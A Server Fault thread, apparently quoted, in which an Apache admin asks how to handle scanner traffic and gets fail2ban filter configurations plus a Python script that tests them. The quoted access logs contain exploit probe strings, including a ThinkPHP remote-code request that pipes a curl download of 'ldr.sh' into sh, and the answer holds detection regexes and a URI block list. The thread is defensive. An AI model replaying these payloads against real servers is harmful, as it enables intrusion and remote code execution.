Apache-2.2

Web server being attacked

  • March 17, 2021

My web server keeps getting hit by attempts that use PHP vulnerabilities and GET requests. How worried should I be about whether I have already been compromised, and how do I check, given that some requests return 302 and some return 200? If I have been compromised, what is the best way to keep the current server configuration and remove scripts I do not need? The examples I provide are from within the last day; they are just a few examples to give you an idea of how serious the problem is. How should I respond to this situation? I also have fail2ban installed. I can provide any other examples/data you need to help me fix this! Thank you very much!

Some access log information:

Example 1:

    - - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:38 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:39 +0000] "POST /api/jsonws/invoke HTTP/1.1" 302 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:39 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 302 628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 302 598 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /console/ HTTP/1.1" 302 524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 744 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:40 +0000] "GET /_ignition/execute-solution HTTP/1.1" 302 560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:41 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /api/jsonws/invoke HTTP/1.1" 404 9450 "http:///api/jsonws/invoke" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "http:///solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:48 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "http:///vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "http://:/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:49 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 9450 "http://:/wp-content/plugins/wp-file-manager/readme.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:49 +0000] "GET /console/ HTTP/1.1" 404 9450 "http://:/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:50 +0000] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 9450 "http:///index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:50 +0000] "GET /_ignition/execute-solution HTTP/1.1" 404 9450 "http:///_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:50 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 5239 "http:///?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:24:50 +0000] "GET /Autodiscover/Autodiscover.xml HTTP/1.1" 404 9450 "http:///Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    - - [11/Mar/2021:16:44:50 +0000] "GET / HTTP/1.1" 200 5235 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

Example 2:

    - - [11/Mar/2021:00:08:41 +0000] "GET /phpmyadmin/ HTTP/1.1"

This line is being spammed over 200 times.

Example 3:

    - - [11/Mar/2021:12:30:28 +0000] "GET /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http:///ldr.sh|sh HTTP/1.1" 200 5041

I have fail2ban installed

Installing fail2ban is not enough; you have to configure it to fit your needs. Fail2ban is just a tool and, like many other tools, it has to be used properly.

To block a "flood" like this, you basically have 3 main options:

  1. If you are sure your pages basically have no broken links, it is enough to react to 404 (or some other 40x) responses:

    [bad-http]
    logpath = /path/to/your/log
    filter =
    # fail on every 40x (excepting 401 for authentication attempt, which should be handled separately):
    # <ADDR> is fail2ban's address placeholder; the empty \[\] is where fail2ban cuts the timestamp out of the line
    failregex = ^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+
    maxretry = 10
    # findtime = some-time-after-maxretry-attempts-should-cause-a-ban
    enabled = true

And you have to check (and possibly correct) the rule that causes the 302 redirects (possibly it should be a whitelist of the URIs that this redirect is allowed to affect).

  2. If you cannot be sure, or you need more precise handling, you have to create a block-list of URIs that such bots use frequently (or check the referrer, some cookie, or anything else), for example:

    [bad-http]
    logpath = /path/to/your/log
    filter =
    # fail on certain 40x (uris starting with this block-list):
    _blocklist = vendor|solr|api|\?a=fetch|wp-content|console|\?XDEBUG_SESSION_START=|Autodiscover
    failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+
    maxretry = 10
    # findtime = some-time-after-maxretry-attempts-should-cause-a-ban
    enabled = true

Note that in this case you have to check whether the URI prefixes in the block-list conflict with your legitimate URIs, and you have to maintain this list continuously. Also note that it is very easy for an "intruder" to avoid your ban simply by changing the URI (for example by adding some other parameter before your prefix).

  3. Same as 2, but using a whitelist of valid URIs:

    [bad-http]
    logpath = /path/to/your/log
    filter =
    # fail on certain 40x (excepting given white-list):
    _whitelist = my-app|other-app
    failregex = ^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+
    maxretry = 10
    # findtime = some-time-after-maxretry-attempts-should-cause-a-ban
    enabled = true

Here you specify all valid prefixes as an RE in `_whitelist`, to avoid possible false positives on legitimate URIs.

Whatever you use, you can start with a large `maxretry` (and a short `findtime`) and a small `bantime` (this avoids overly long bans on possible false positives); if your fail2ban version is >= 0.10 and `bantime.increment` is enabled, repeat offenders will later be banned for longer and faster.

Also consider https://github.com/fail2ban/fail2ban/wiki/Best-practice for some advice on how to configure fail2ban jails and filters more efficiently.
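To see how the three filters above behave on lines like the ones in the question, here is an added Python script (not part of the answer, and not fail2ban's own code) that emulates the relevant parts of `fail2ban-regex`: it expands `<ADDR>`, cuts the timestamp out of each line (which is why the regexes contain an empty `\[\]`) and counts matches per address. The IP addresses and the legitimate `/my-app` lines are constructed, since the posted log has its addresses scrubbed.

```python
import re
from collections import Counter

# Constructed sample lines in the question's combined-log format; the IPs are
# made up because the posted log has them scrubbed. 203.0.113.7 plays the
# scanner, 198.51.100.9 a legitimate user who hits one broken link.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Mar/2021:16:24:38 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 608 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Mar/2021:16:24:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 9450 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Mar/2021:16:24:47 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 9450 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Mar/2021:16:24:48 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 5239 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Mar/2021:16:30:00 +0000] "GET /my-app/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
198.51.100.9 - - [11/Mar/2021:16:30:05 +0000] "GET /my-app/missing.css HTTP/1.1" 404 512 "-" "Mozilla/5.0"
"""

# Emulation of two things fail2ban does before applying failregex: <ADDR> is
# expanded to an address pattern, and the timestamp inside [...] is removed,
# leaving the empty "[]" that the answer's regexes match with \[\].
DATE_RE = re.compile(r"\[[^\]]*\]")
ADDR_RE = r"(?P<addr>\d{1,3}(?:\.\d{1,3}){3})"

def compile_failregex(failregex, **vars_):
    """Substitute %(name)s variables (as fail2ban's ini parser does) and <ADDR>."""
    return re.compile((failregex % vars_).replace("<ADDR>", ADDR_RE))

def failures(log, failregex, **vars_):
    """Counter of failing addresses, one count per line that matches failregex."""
    rx = compile_failregex(failregex, **vars_)
    hits = Counter()
    for line in log.splitlines():
        m = rx.search(DATE_RE.sub("[]", line, count=1))
        if m:
            hits[m.group("addr")] += 1
    return hits

# The three failregex variants from the answer, verbatim.
ANY_40X = r'^<ADDR> \S+ \S+ \[\] "[^"]+" 40(?!1)\d\s+'
BLOCKLIST = r'^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?:%(_blocklist)s)\b[^"]*" 40\d\s+'
WHITELIST = r'^<ADDR> \S+ \S+ \[\] "[A-Z]+ /(?!%(_whitelist)s)\b[^"]*" 40\d\s+'

def summarize(log=SAMPLE_LOG):
    """Per-filter hit counts; compare each count against the jail's maxretry."""
    return {
        "any40x": failures(log, ANY_40X),
        "blocklist": failures(log, BLOCKLIST, _blocklist=r"vendor|solr|api|\?a=fetch"),
        "whitelist": failures(log, WHITELIST, _whitelist=r"my-app|other-app"),
    }

if __name__ == "__main__":
    for name, hits in summarize().items():
        print(name, dict(hits))
```

The 302 and 200 lines never count under any of the three filters, which is why the answer insists on fixing the redirect rule; only the plain 40x filter also counts the legitimate user's broken link.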

Quoted from: https://serverfault.com/questions/1056779